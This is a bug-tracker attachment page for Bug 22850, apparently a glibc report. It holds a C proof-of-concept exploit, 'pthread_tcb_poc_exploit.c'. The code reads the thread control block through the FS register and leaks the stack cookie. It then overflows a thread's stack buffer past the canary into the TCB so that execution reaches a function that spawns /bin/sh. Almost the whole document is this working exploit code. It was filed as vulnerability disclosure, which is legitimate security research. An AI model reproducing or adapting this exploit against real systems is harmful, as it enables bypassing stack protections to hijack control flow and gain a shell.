Attachment 10825 Details for Bug 22850 – Proof Of Concept

Proof Of Concept

pthread_tcb_poc_exploit.c (text/x-csrc), 1.15 KB, created by Ilya Smith on 2018-02-16 12:09:04 UTC

(hide)

Description:

Filename:

MIME Type:

Creator: Ilya Smith

Created: 2018-02-16 12:09:04 UTC

Size: 1.15 KB

patch

obsolete

>#include <pthread.h>
>#include <stdlib.h>
>#include <stdio.h>
>#include <asm/prctl.h>
>#include <sys/prctl.h>
>void pwn_payload() {
>	char *argv[2] = {"/bin/sh", 0};
>	execve(argv[0], argv, 0);
>}
>
>int fixup = 0;
>void * first(void *x)
>{
>	unsigned long *addr;
>	arch_prctl(ARCH_GET_FS, &addr);
>	printf("thread FS %p\n", addr);
>	printf("cookie thread: 0x%lx\n", addr[5]);
>	unsigned long * frame = __builtin_frame_address(0);
>	printf("stack_cookie addr %p \n", &frame[-1]);
>	printf("diff : %lx\n", (char*)addr - (char*)&frame[-1]); 
>	unsigned long len =(unsigned long)( (char*)addr - (char*)&frame[-1]) + fixup;
>	// example of exploitation
>	// prepare exploit
>	void *exploit = malloc(len);
>	memset(exploit, 0x41, len);
>	void *ptr = &pwn_payload;
>	memcpy((char*)exploit + 16, &ptr, 8);
>	// exact stack-buffer overflow example
>	memcpy(&frame[-1], exploit, len);
>	return 0;
>}
>
>int main(int argc, char **argv, char **envp)
>{
>	pthread_t one;
>	unsigned long *addr;
>	void *val;
>	arch_prctl(ARCH_GET_FS, &addr);
>	if (argc > 1)
>		fixup = 0x30;
>	printf("main FS %p\n", addr);
>	printf("cookie main: 0x%lx\n", addr[5]);
>	pthread_create(&one, NULL, &first, 0);
>	pthread_join(one,&val);
>	return 0;
>}
>
>

Actions: View

Attachments on bug 22850: 10825